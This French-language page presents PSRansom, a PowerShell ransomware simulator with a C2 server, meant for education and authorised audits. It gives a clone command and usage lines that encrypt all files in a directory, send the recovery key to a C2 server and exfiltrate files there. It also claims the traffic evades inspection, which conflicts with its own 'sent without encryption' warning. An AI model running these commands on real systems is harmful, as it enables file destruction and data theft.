
Simulateur de ransomware PowerShell avec serveur C2

PSRansom est un simulateur de ransomware PowerShell avec des capacités de serveur C2. Cet outil vous aide à simuler le processus de chiffrement d'un ransomware générique sur n'importe quel système sur n'importe quel système avec PowerShell installé dessus. Grâce au serveur C2 intégré, vous pouvez exfiltrer des fichiers et recevoir des informations client via HTTP.
Toute communication entre les deux éléments est chiffrée ou encodée afin de ne pas être détectée par les mécanismes d'inspection du trafic, bien qu'à aucun moment HTTPS ne soit utilisé.
Il est recommandé de cloner le dépôt complet ou de télécharger le fichier zip. Vous pouvez le faire en exécutant la commande suivante :
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: This tool helps you simulate encryption process of a
generic ransomware in PowerShell with C2 capabilities
Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
Encrypt all files & sends recovery key to C2Server
Use -x to exfiltrate and decrypt files on C2Server
.\PSRansom.ps1 -d Directory -k RecoveryKey
Decrypt all files with recovery key string
Warning: All info will be sent to the C2Server without any encryption
You need previously generated recovery key to retrieve files
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
Ce projet est sous licence GNU 3.0 - consultez le fichier LICENSE pour plus de détails.
Cet outil a été créé et conçu de toutes pièces par Joel Gámez Molina // @JoelGMSec
Ce logiciel n'offre aucune garantie. Son utilisation est exclusive pour des environnements éducatifs et/ou des audits de sécurité avec le consentement correspondant du client. Je ne suis pas responsable de son utilisation abusive ou de tout dommage éventuel causé par celui-ci.
Pour plus d'informations, vous pouvez me trouver sur Twitter en tant que @JoelGMSec et sur mon blog darkbyte.net.
Vous pouvez soutenir mon travail en m'offrant un café :